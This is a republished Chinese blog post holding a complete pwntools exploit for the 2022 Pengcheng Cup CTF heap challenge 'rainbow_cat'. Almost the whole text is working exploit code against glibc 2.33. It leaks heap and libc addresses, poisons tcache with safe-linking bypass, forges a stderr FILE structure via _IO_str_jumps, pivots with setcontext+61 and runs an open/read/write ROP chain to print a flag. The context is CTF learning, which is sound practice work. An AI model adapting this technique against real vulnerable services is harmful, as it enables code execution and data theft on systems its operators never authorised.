标签:rainbow 鹏程 p64 edit 0x10 add base heap pwn
2022 鹏程杯 pwn rainbow_cat
我也不知道我是怎么搞出来的,学技术还得看winmt大师博客https://www.cnblogs.com/winmt/articles/16440009.html
from pwn import*
context(os='linux',arch='amd64',log_level='debug')
#s = process('./rainbowcat')
s = remote('192.168.1.102',9999)
libc = ELF('./libc-2.33.so')
def add(index):
s.sendlineafter(b'Your choice >> ', b'1')
s.sendlineafter(b'Which cat do you want to get? ', str(index))
def delete(index):
s.sendlineafter(b'Your choice >> ', b'2')
s.sendlineafter(b'Which one do you want to abandon? ', str(index))
def show(index):
s.sendlineafter(b'Your choice >> ', b'3')
s.sendlineafter(b'Choose a cat to show name: ', str(index))
def edit(index,content):
s.sendlineafter(b'Your choice >> ', b'4')
s.sendlineafter(b'Which one?', str(index))
s.sendafter(b'Rename the cat: ', content)
# 0 heap_base + 0x90
# 1 heap_base + 0x10
for i in range(7):
add(0)
add(1)
add(2)
for i in range(7):
delete(0)
edit(0, b'a'*0x10)
delete(0)
show(0)
s.recvuntil(b'Name:')
heap_base = u64(s.recv(6).ljust(8,b'\x00')) << 12
success('heap_base=>' + hex(heap_base))
edit(0, p64((heap_base+0x10)^(heap_base >> 12)))
add(0)
add(1)
for i in range(7):
delete(1)
edit(1, p64(8) + b'a'*8)
delete(1)
show(1)
s.recvuntil(b'Name:')
libc_base = u64(s.recv(6).ljust(8,b'\x00')) - 0x1e0c00
success('libc_base=>' + hex(libc_base))
__free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
_IO_2_1_stderr_ = libc_base + libc.sym['_IO_2_1_stderr_']
_IO_str_jumps = libc_base + 0x1e2560
setcontext_61 = libc_base + libc.sym['setcontext'] + 61
_IO_stdfile_2_lock = libc_base + 0x1e3660
pop_rdi_ret = libc_base + 0x0000000000028a55
pop_rsi_ret = libc_base + 0x000000000002a4cf
pop_rdx_ret = libc_base + 0x00000000000c7f32
pop_rax_ret = libc_base + 0x0000000000044c70
syscall_ret = libc_base + 0x000000000006105a
ret = libc_base + 0x0000000000026699
magic = libc_base + 0x000000000014a0a0
fake_IO_stderr_addr = heap_base + 0x10
rop = heap_base + 0x500
edit(1, p64(0)*2)
delete(0)
edit(0, b'a'*0x10)
delete(0)
edit(0, p64((heap_base+0x90)^(heap_base >> 12)))
add(0)
add(0)
edit(1, p64(1))
edit(0, p64(heap_base+0x2a0))
add(2)
####### _IO_2_1_stderr_._chain => heap_base + 0x10
edit(1, p64(7))
delete(2)
edit(2, p64((_IO_2_1_stderr_+0x60-0x10)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x2c0))
add(2)
edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x290)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x2e0))
add(2)
edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x2b0)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x300))
add(2)
edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x2d0)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x320))
add(2)
edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x2f0)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x340))
add(2)
edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x310)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x360))
add(2)
edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x330)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(1, p64(0))
edit(0, p64(0))
add(2)
##### prepare for malloc free memcpy
edit(1, p64(1))
edit(0, p64(heap_base + 0x20))
add(2)
edit(2, p64(0) + p16(0) + p16(1))
edit(1, p64(1))
edit(0, p64(heap_base + 0x90 + 0x60))
add(2)
edit(2, p64(0) + p64(__free_hook))
#####
edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x20))
add(2)
edit(2, p64(0) + p64(0xffffffffffffffff))
edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0xd0))
add(2)
edit(2, p64(0) + p64(_IO_str_jumps))
edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x80))
add(2)
edit(2, p64(0) + p64(_IO_stdfile_2_lock))
edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x30))
add(2)
edit(2, p64(0) + p64(fake_IO_stderr_addr + 0x100))
edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x40))
add(2)
edit(2, p64(fake_IO_stderr_addr + 0x140) + p64(0))
edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x100))
add(2)
edit(2, p64(magic) + p64(heap_base + 0x10 + 0x1f0))
edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0xf0))
add(2)
edit(2, p64(0) + p64(0x21))
edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x110))
add(2)
edit(2, p64(0) + p64(0x21))
edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x210))
add(2)
edit(2, p64(setcontext_61))
edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x1f0 + 0xa0))
add(2)
edit(2, p64(rop) + p64(ret))
###### rop
edit(1, p64(1))
edit(0, p64(rop+0x100))
add(2)
edit(2, b'./flag\x00')
edit(1, p64(1))
edit(0, p64(rop))
add(2)
edit(2, p64(pop_rdi_ret) + p64(rop+0x100))
edit(1, p64(1))
edit(0, p64(rop+0x10))
add(2)
edit(2, p64(pop_rsi_ret) + p64(0))
edit(1, p64(1))
edit(0, p64(rop+0x20))
add(2)
edit(2, p64(pop_rdx_ret) + p64(0))
edit(1, p64(1))
edit(0, p64(rop+0x30))
add(2)
edit(2, p64(pop_rax_ret) + p64(2))
edit(1, p64(1))
edit(0, p64(rop+0x40))
add(2)
edit(2, p64(syscall_ret) + p64(ret))
edit(1, p64(1))
edit(0, p64(rop+0x50))
add(2)
edit(2, p64(pop_rdi_ret) + p64(3))
edit(1, p64(1))
edit(0, p64(rop+0x60))
add(2)
edit(2, p64(pop_rsi_ret) + p64(rop+0x200))
edit(1, p64(1))
edit(0, p64(rop+0x70))
add(2)
edit(2, p64(pop_rdx_ret) + p64(0x50))
edit(1, p64(1))
edit(0, p64(rop+0x80))
add(2)
edit(2, p64(pop_rax_ret) + p64(0))
edit(1, p64(1))
edit(0, p64(rop+0x90))
add(2)
edit(2, p64(syscall_ret) + p64(ret))
edit(1, p64(1))
edit(0, p64(rop+0xa0))
add(2)
edit(2, p64(pop_rdi_ret) + p64(1))
edit(1, p64(1))
edit(0, p64(rop+0xb0))
add(2)
edit(2, p64(pop_rsi_ret) + p64(rop+0x200))
edit(1, p64(1))
edit(0, p64(rop+0xc0))
add(2)
edit(2, p64(pop_rdx_ret) + p64(0x50))
edit(1, p64(1))
edit(0, p64(rop+0xd0))
add(2)
edit(2, p64(pop_rax_ret) + p64(1))
edit(1, p64(1))
edit(0, p64(rop+0xe0))
add(2)
edit(2, p64(syscall_ret) + p64(ret))
#### tigger
edit(1, p64(1))
edit(0, p64(_IO_2_1_stderr_))
#gdb.attach(s)
#pause()
add(2)
s.interactive()
标签:rainbow,鹏程,p64,edit,0x10,add,base,heap,pwn 来源: https://www.cnblogs.com/pwnfeifei/p/16440100.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。